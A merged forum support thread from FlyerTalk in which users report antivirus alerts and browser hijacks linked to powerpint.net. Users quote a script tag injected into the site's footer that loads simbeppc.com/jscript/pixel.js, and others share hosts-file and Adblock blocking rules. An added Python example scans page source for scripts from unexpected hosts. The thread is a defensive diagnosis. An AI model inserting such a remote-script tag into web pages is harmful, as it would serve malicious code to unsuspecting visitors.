Technical Support and Feedback - Malicious calls to powerpint.net on FT [Merged threads]




bmvaughn
Feb 6, 12, 10:59 am
I've been getting a number of TrendMicro warnings about possible malicious code when visiting FT. Believe it's related to the MileagePlus Explorer card ads.

Error below:
http://i.imgur.com/nZll6.png


bmvaughn
Feb 6, 12, 6:07 pm
Pretty much making browsing the site unusable. Happens on all Chase ads.

IBobi
Feb 6, 12, 6:14 pm
Is it your virus warnings that are making browsing difficult, or is it the ads themselves? What exactly is happening?


bmvaughn
Feb 6, 12, 6:15 pm
Is it your virus warnings that are making browsing difficult, or is it the ads themselves? What exactly is happening?

Virus warning that pops to be Always on Top whenever I browse any FT page that has a Chase ad.

IBobi
Feb 6, 12, 6:17 pm
Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

bmvaughn
Feb 6, 12, 6:22 pm
Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

I suggest having your ad reps look for redirects on the Chase ads to route via powerpint.net. Right now anyone browsing your site with Trend Micro would get this result.

You can check maliciousness here:
http://global.sitesafety.trendmicro.com/
using "powerpint.net/in.cgi?2" as the destination.

RBH58
Feb 7, 12, 3:33 am
I suggest having your ad reps look for redirects on the Chase ads to route via powerpint.net. Right now anyone browsing your site with Trend Micro would get this result.

You can check maliciousness here:
http://global.sitesafety.trendmicro.com/
using "powerpint.net/in.cgi?2" as the destination.

I can confirm that this is the case! :mad:

bmvaughn
Feb 8, 12, 11:05 am
Not sure if you still have the issue... I got tired of the warning so I changed my HOSTS file.

IBobi
Feb 8, 12, 11:12 am
Hi all,

Our internal malvertising team has rescanned the ads in question (Chase) and determined that the ads are safe. Also, Google's SafeBrowsing service did not flag any of the content.

Most likely the reason it was flagged is due to differences in classification of malicious content; the website VirusTotal shows that only 1 out of 17 security sites have listed the URL mentioned here as malicious. That one security site is TrendMicro (https://www.virustotal.com/url/bd943e2e1c3913b3b4fb64dbf58d80f233796c996bcb30b6fdd027db90e55b3a/analysis/).

Please let me know if we can be of any further help on this!

Paul

wharvey
Feb 13, 12, 5:13 pm
I am having problems browsing Flyertalk.... I am having to double click on the "Back" button on my IE browser. Used to only have to click once... and I see at the bottom of the screen a web address that has powerpint.net in the name.

That is new to me... never noticed that before.

IBobi
Feb 13, 12, 5:14 pm
Could be ad-related; I'll check it out.

IBobi
Feb 14, 12, 11:49 am
We're not seeing it as an ad; did you try clearing your cache?

Also is it possible it's local to your machine, i.e. a bad cookie or malware? Issue has not been reported by other users as yet.

wharvey
Feb 14, 12, 3:49 pm
Looks like this is related to this issue I just saw in another thread:

http://www.flyertalk.com/forum/technical-issues/1311069-malicious-code-ft-ad.html

I tried clearing the cache... but still only getting the powerpint.net message at the bottom when on FT... and having to double click the back button to get back to the previous page.

IBobi
Feb 15, 12, 11:32 am
Still happening?

Tech investigations see no malicious code on the site, FYI.

FriendlySkies
Feb 15, 12, 9:31 pm
Still happening?

Tech investigations see no malicious code on the site, FYI.

Had it happen to me this morning, as well as last night.

cblaisd
Feb 15, 12, 11:17 pm
Looks like this is related to this issue I just saw in another thread:

http://www.flyertalk.com/forum/technical-issues/1311069-malicious-code-ft-ad.html

I tried clearing the cache... but still only getting the powerpint.net message at the bottom when on FT... and having to double click the back button to get back to the previous page.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

FluffyBunnyFuFu
Feb 16, 12, 12:09 am
McAfee gave me a warning about powerprint.net.

Should I be concerned?

wharvey
Feb 16, 12, 6:09 am
Cblaisd,

I am using Windows....

Not sure where to find the .hosts files though.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

cblaisd
Feb 16, 12, 7:55 am
In the post I linked to, I'd recommend getting that little program (which will make the process easy).

AlohaDaveKennedy
Feb 16, 12, 7:58 am
Also seeing powerpint.net message as I switch between screens. First I ever heard of it mouthwash ain't gonna cut it.

**Did further research and testing - this "enhancement" to our browsing experience has been flagged as coda-non-grata by various corporate internet content screening utilities which are then blocking it every time it is called up. So long as FT's site has it as a function of an advertising/marketing effort, those folks whose systems operate with minder software and who do not have admin rights to short circuit the minder software or this "enhancement" are going to be seriously annoyed. Looks like this "enhancement" is called up with every new page, so one might assume it is an eyeball tracker that has offended the Great Gods of Censure.**

AlohaDaveKennedy
Feb 16, 12, 8:05 am
That gonna work on boxes where you have no admin rights to create the file?:td: Issue just happening on FT.

Assuming you're using Windows, edit your .hosts file to point that call to localhost

http://www.flyertalk.com/forum/technical-issues/1015335-loading-pixel-quantserve-com.html#post12819365

AlohaDaveKennedy
Feb 16, 12, 8:20 am
EOTL - so long as this powerpint nuisance continues FT is DOA to me.

Hi all,

Our internal malvertising team has rescanned the ads in question (Chase) and determined that the ads are safe. Also, Google's SafeBrowsing service did not flag any of the content.

Most likely the reason it was flagged is due to differences in classification of malicious content; the website VirusTotal shows that only 1 out of 17 security sites have listed the URL mentioned here as malicious. That one security site is TrendMicro (https://www.virustotal.com/url/bd943e2e1c3913b3b4fb64dbf58d80f233796c996bcb30b6fdd027db90e55b3a/analysis/).

Please let me know if we can be of any further help on this!

Paul

bmvaughn
Feb 16, 12, 8:22 am
Up to 2/17. Maybe it's time to ask Chase for new 3PS tags?

vasantn
Feb 16, 12, 4:01 pm
This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

IBobi
Feb 16, 12, 4:02 pm
Thank you, we are on this!

okazon69
Feb 16, 12, 4:05 pm
I'm getting a JavaScript Exploit error alert from my AVG on many FT pages:

simbeppc.com/jscript/pixel.js

<div align="center">

<div class="smallfont" align="center">

<!-- Do not remove or your scheduled tasks will cease to function -->

<!-- Do not remove or your scheduled tasks will cease to function -->

<script src="http://simbeppc.com/jscript/pixel.js"></script>
</div>
</div>

Very annoying! :mad: Please clean up the site....

Edit to add: also just now reported here (http://www.flyertalk.com/forum/18029870-post12.html).

pseudoswede
Feb 16, 12, 4:05 pm
Every time I navigate a page on FT, I've been getting this warning...

http://dl.dropbox.com/u/1950312/ftvirus.png

Has been happening the past 2-3 hours.

Running Chrome with AdBlockPlus.

cheltzel
Feb 16, 12, 4:06 pm
Hmm, well, not getting any other reports of this behavior. Not sure what to tell you at this point.

I am getting constant alerts from AVG antivirus on simbeppc.com/jscript/pixel.js

here is the message text

The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: simbeppc.com/jscript/pixel.js
Name: JavaScript Obfuscation (type 156)


It makes the site pretty much unusable for me. Maybe you should check the ad site to see if they are trying some exotic tracking cookie.

HikerT
Feb 16, 12, 4:08 pm
Ditto.

IBobi
Feb 16, 12, 4:08 pm
Tech has been advised, thank you!

b1513
Feb 16, 12, 4:11 pm
Thank you, we are on this!


Thanks. It's happening to me too on my iPad.

Bobette

anrkitec
Feb 16, 12, 4:11 pm
Happening here too - very annoying.

Physci
Feb 16, 12, 4:13 pm
This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Same here on iOS (Safari) so looks site specific

cheltzel
Feb 16, 12, 4:20 pm
I've alerted tech, thank you!

Ibobi, I did a web search and it seems to be hitting multiple InternetBrands sites (HiDef Forum for example)

lin821
Feb 16, 12, 4:20 pm
This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Yes, it's so annoying! On FF w/AdBlock Plus here.

I'm getting a JavaScript Exploit error alert from my AVG on many FT pages...
Starting about 3 days ago on Valentine's Day, I got warning of Java Exploits for at least 5 times by MSE. I see repetitive occurrence of two things:
Java/CVE-2010-0840.OQ &
Java/CVE-2010-3544.AQ.

Are they all related to malicious ad on FT?

vasantn
Feb 16, 12, 4:22 pm
This just started a minute ago. Any FT page that I open scrolls down to the bottom instantly. Is anyone else experiencing this?

Update: Happening with FF but not with IE, so could be something specific to my computer.

Thank you, we are on this!

Fixed! I'm impressed. ^

cheltzel
Feb 16, 12, 4:23 pm
Whatever the tech folks did, it has stopped for me (Win XP/IE8)

wharvey
Feb 16, 12, 7:30 pm
I am totally lost here... but so annoying.... and seems like I am not the only one having this problem. sigh!

lin821
Feb 17, 12, 3:53 am
I am totally lost here... but so annoying.... and seems like I am not the only one having this problem. sigh!
I just ran into a new problem with powerpint.net. My problem is not 2-click of "Back" button though.

Two things I've noticed:

1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. The significant slowness starts on January 27th. However, the slowness hasn't been consistent. There are good days and there are bad days. I just can't tell the pattern. :(

2). What just happened to me is simply shocking. I was visiting different fora on multiple tabs and decided to pay TB Topics Forum another visit.
2a). I clicked on TB Topics Forum link from FT fora home page.
2b). I then took a look at another tab.
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.

Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net :eek:

Didn't realize powerpint.net can hijack my browsing page to a total spam site. :mad:

Arcanum
Feb 17, 12, 8:24 am
I've also been getting it the last few days. Clearly a FT problem.

linsj
Feb 17, 12, 8:33 am
I noticed the powerpint.net message this morning, which is related to the scripting message (A script on this page is causing Internet Explorer to run slowly. If it continues to run, your computer may become unresponsive. Do you want to abort the script?) I've been getting for days on FT. FT is unusable in IE.

cblaisd
Feb 17, 12, 9:29 am
The other thing that has been advised many times is to use Firefox with the AdBlock extension. No ads.

lin821
Feb 17, 12, 10:06 am
The other thing that has been advised many times is to use Firefox with the AdBlock extension. No ads.
That's exactly what I use. Still that doesn't save me from all the recent acting out on FT, especially not since the Valentine's Day. :(

cblaisd
Feb 17, 12, 10:22 am
Well, it's a simple enough matter to edit your .hosts file either manually or via the program I linked to above.

linsj
Feb 17, 12, 1:58 pm
I have the ads blocked. I use Chrome for a few sites but still prefer IE for a lot of others, including FT. (No flaming, please!)

wharvey
Feb 17, 12, 2:03 pm
Same here!

I have the ads blocked. I use Chrome for a few sites but still prefer IE for a lot of others, including FT. (No flaming, please!)

canddmeyer
Feb 18, 12, 1:37 pm
This may be related to a pop-up for security I am getting from:

http://domdex.com


Very annoying as I get it on every page.

david4455
Feb 19, 12, 8:48 am
I use Trend Micro to protect my computers. For the last week the protection software has detected and blocked a website from trying to get in. Sometimes as many as 4 times a minute for about 20 minutes or so then it stops....and may resume the next day when I log on or at some point while I am surfing. My log is showing over 176 times. I tried to trace it back to the first time using my history and it was when I was on the Alaska Air website. :rolleyes:

I have googled the website threat and nothing shows up nor does it in the Trend Micro threats encyclopedia.

While the TM software is blocking it I wonder if there is something I can do to stop these attempted break-ins.( if that is what it is)

The website: powerpint. net/ in. cgi?2 ( I put a couple spaces in there so I didn't make it live)

Any thoughts?

mre5765
Feb 19, 12, 8:58 am
You have no physical firewall (i.e., you are directly connected to the Internet), your physical firewall has been compromised, your physical firewall has weak setting, or you have malware on your computer.

A good physical firewall should let you block all traffic to and from the site in question. If trend still says there is an intrusion attempt, then you have malware.

alanh
Feb 19, 12, 12:01 pm
There's a discussion of it in the Technical Issues forum.

david4455
Feb 19, 12, 1:29 pm
Whatever the tech folks did, it has stopped for me (Win XP/IE8)

Not for me....I have had 176 attempted attacks since February 13th.

"powerpint.net/in.cgi?2"

Trend Micro blocks it....but it still is an aggressive attempt at something.

david4455
Feb 19, 12, 1:36 pm
There's a discussion of it in the Technical Issues forum.

Thanks. Good to know that I am not alone and it seems to be a FT issue that developed around the 13 of February......

FriendlySkies
Feb 19, 12, 7:20 pm
Just got the powerprint.net redirect when going to the UA Crew Base thread.

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Come on, IB?!

keeton
Feb 20, 12, 8:42 am
I've been seeing the powerpint.net url in my list when I try to use the back arrow. For a while my AntiMalwareBytes software was flagging it.

For me, this only happens when using IE (I'm using IE 9, if it makes any difference). I also have Firefox installed on the same machine and I don't see it. I have edited my hosts file to redirect powerpint to 127.0.0.1 so hopefully there will be no damage.

It only happens with FT and IE and it is very annoying.

david4455
Feb 21, 12, 6:54 am
I am using Chrome. But the attempted infiltration or attacks or hijacks or whatever powerpint.net was trying to do stopped 3 days ago.......

wharvey
Feb 21, 12, 10:26 am
Are you still having the problem after doing the edits?

I am reluctant to make those edits.... since I am not quite sure how... :)

I've been seeing the powerpint.net url in my list when I try to use the back arrow. For a while my AntiMalwareBytes software was flagging it.

For me, this only happens when using IE (I'm using IE 9, if it makes any difference). I also have Firefox installed on the same machine and I don't see it. I have edited my hosts file to redirect powerpint to 127.0.0.1 so hopefully there will be no damage.

It only happens with FT and IE and it is very annoying.

yosithezet
Feb 21, 12, 10:45 am
Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

jackal
Feb 21, 12, 11:25 am
Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

Don't have TrendMicro, but my page loads often seem to get hung up on something from powerpint.net.

IBobi
Feb 21, 12, 1:00 pm
Hi all,

The issue has been reported but we are having trouble recreating it in house. Hold on and the tech team will keep trying to address this.

Thanks,

Paul

IBobi
Feb 21, 12, 1:02 pm
We're still looking into the powerpint.net issue. Thank you for reporting!

Paul

lin821
Feb 22, 12, 1:18 am
... my page loads often seem to get hung up on something from powerpint.net.
Same here. Sooooo annoying!

Two things I've noticed:

1). FT has been slowing down my browsing speed since I returned home after Chinese New Year. <snip>

2). ...
2c). I refreshed TB Topics Forum when I returned to the TB Forum tab.

Guess where FT took me? Here: http://spi.domainsponsor.com/lander.shtml?powerpint.net :eek:

Didn't realize powerpint.net can hijack my browsing page to a total spam site. :mad:

Not again! I was searching for my own posts under "My Profile." The 1st search took forever, so I decided to refresh the page then I got the powerpint hijack again :

http://spi.domainsponsor.com/lander.shtml?powerpint.net

This is too ridiculous that I just dropped FT as my FF homepage. :(

Just got the powerprint.net redirect when going to the UA Crew Base thread.

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Come on, IB?!

IBobi
Feb 22, 12, 6:32 pm
Moved thread to tech issues. Tech is working on this.

FriendlySkies
Feb 22, 12, 9:15 pm
Another powerpint hijacking when viewing the UA forum.

LMB01
Feb 23, 12, 12:42 pm
Anyone else getting TREND MICRO OfficeScan complaining about attempts to hit http://powerpint.net/in.cgi?2 every time you load an FT page.

Yes, I've been getting it on my work PC for a few days. Today is the first day I've started to see it on my MAC. Agree it is annoying. I have been minimizing my browsing on FlyerTalk as a result.

IBobi
Feb 23, 12, 5:16 pm
Hi all,

I've merged these threads together so everyone can get the same messaging on this. It will make for confused reading if you try to go back and read chronologically, but what's more important is what happens going forward.

First, thank you for reporting and monitoring this issue with us. Without your data, there's no way we could track this issue. I know it's been frustrating and we've been watching this on a daily basis.

Thus far, we have been unable to find any trace of anything malicious on FT. We've looked hard and it's come up clean. So we need some additional data.

If you could, *email* me the URL (from your browser window) of the page you're on when you see the error/warning message.

IMPORTANTLY, also include the source code from the page; you do this by clicking CTRL+U (or right click and "view page source") and copy and paste it into an email to me.

My address is paul.obrien at internetbrands.com.

Thank you folks. We'll figure out what's up.

Paul

HikerT
Feb 23, 12, 6:38 pm
I can get it to manifest for any thread by clicking on Thread Tools, Show Printable Version...

I looked at the HTML source and this is what it shows at the bottom. Clearly something being served by the FT servers, NOT from an advertisement (or it would not show up in the HTML).

<p class="smallfont" align="center">

<br />
<script src="http://simbeppc.com/jscript/pixel.js"></script>
</p>

<br /><div style="z-index:3" class="smallfont" align="center">SEO by vBSEO 3.6.0 &copy;2011, Crawlability, Inc.</div>
</body>

</html>
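The check HikerT did by eye can be automated over saved page source. This is an added example, not part of the original post or of the site's own tooling: it lists every external script in a page whose host is not on an operator allowlist. The allowlist contents, `page_host` default and function names are assumptions; the sample markup is the excerpt posted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts the operator expects to serve scripts from (assumed for this example).
ALLOWED_SCRIPT_HOSTS = {"flyertalk.com"}

# Page-source excerpt as posted in the thread above.
SAMPLE_SOURCE = """<p class="smallfont" align="center">

<br />
<script src="http://simbeppc.com/jscript/pixel.js"></script>
</p>

<br /><div style="z-index:3" class="smallfont" align="center">SEO by vBSEO 3.6.0 &copy;2011, Crawlability, Inc.</div>
</body>

</html>
"""


class ScriptSrcCollector(HTMLParser):
    """Record (line number, src) for every <script src=...> tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lowercased; inline scripts
        # (no src attribute) are out of scope for this check.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.found.append((self.getpos()[0], src.strip()))


def script_host(src, page_host):
    """Host a script URL loads from; relative paths use the page's host."""
    host = urlsplit(src).hostname or page_host
    return host.lower().rstrip(".")


def is_allowed(host, allowed):
    # Exact match or a true subdomain; "flyertalk.com.example" must not pass.
    return any(host == a or host.endswith("." + a) for a in allowed)


def unexpected_scripts(page_source, page_host="www.flyertalk.com",
                       allowed=ALLOWED_SCRIPT_HOSTS):
    """Return one finding per script whose host is outside the allowlist."""
    parser = ScriptSrcCollector()
    parser.feed(page_source)
    parser.close()
    findings = []
    for line, src in parser.found:
        host = script_host(src, page_host)
        if not is_allowed(host, allowed):
            findings.append({"line": line, "host": host, "src": src})
    return findings


if __name__ == "__main__":
    for f in unexpected_scripts(SAMPLE_SOURCE):
        print(f"line {f['line']}: script from unexpected host {f['host']}: {f['src']}")
```

Run against page source fetched directly from the origin server, a hit like this one points at the template or database rather than at an ad network, since ad creatives are loaded later by the ad tag and do not appear in the served HTML.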

IBobi
Feb 24, 12, 1:08 pm
Thank you for that, Hikert.

chollie
Feb 24, 12, 9:01 pm
Firefox browser, just did the latest update today (finally) and now I'm getting the same problem with every FT pageload. Not happening on any other sites.

(edited to add) Just now when I posted this post, power.pint briefly came up before the post posted.

lin821
Feb 25, 12, 7:45 am
FF Browser got hijacked by powerpint.net again when visiting between fora 4 minutes ago:

1. Clicking Travel&Dining: Destination >> The World
2. Clicking Asia Forum.
3. Instead of landing in Asia, this is what I got: :td:

http://spi.domainsponsor.com/lander.shtml?powerpint.net

Mwenenzi
Feb 26, 12, 3:31 am
Message on my screen "transferring data from powerpint.net" when loading this thread page
Using FF10.0.2 with adblock. noScript & ShareMeNot

LRD
Feb 28, 12, 11:10 pm
... Using FF10.0.2 with adblock ...

Well, since you're already using Adblock, you might want to add a custom rule, something like:

powerpint.net^$domain=flyertalk.com

cblaisd
Feb 28, 12, 11:19 pm
Thank you!!

BigMoneyGrip
Feb 29, 12, 9:50 am
Anyone else seeing "Connecting to 192.168.90.231" every time a page loads? It causes a serious delay as this is an unreachable IP address.

IBobi
Feb 29, 12, 11:12 am
Is anyone still seeing the powerpint.net error at all? Please let me know if so. Should be resolved now.

Paul

yosithezet
Mar 1, 12, 12:02 am
Was fine a few hours ago at home. Now in the lounge at SIN and I'm getting it on every single FT page load but no other website.

JayhawkCO
Mar 1, 12, 10:18 am
Just got rerouted to http://spi.domainsponsor.com/lander.shtml?powerpint.net after clicking http://www.flyertalk.com/forum/united-mileageplus-consolidated/1319413-suggestions-small-improvements-intl-f.html.

canddmeyer
Mar 2, 12, 10:22 am
I'm still having the powerpint issue, and the occasional domdex.com pop-up too.

wharvey
Mar 11, 12, 3:30 pm
Anyone still having issues? I cannot view FT via IE. It just hangs up and takes forever to load pages. Only website I have this problem on.

I now have to view FT via Firefox.

IBobi
Mar 12, 12, 1:03 pm
Anyone still having issues? I cannot view FT via IE. It just hangs up and takes forever to load pages. Only website I have this problem on.

I now have to view FT via Firefox.

Assuming you've cleared cookies/cache... no idea. Not getting such an issue reported widely... or even from another FTer at the moment as far as I know.

Have you tried uninstalling IE and reinstalling?

ExitRowAisle
Mar 13, 12, 3:05 pm
If you are looking for others to confirm it is still a problem, I can attest that the problem went away for a few days, but it has returned on my home computer (using IE).


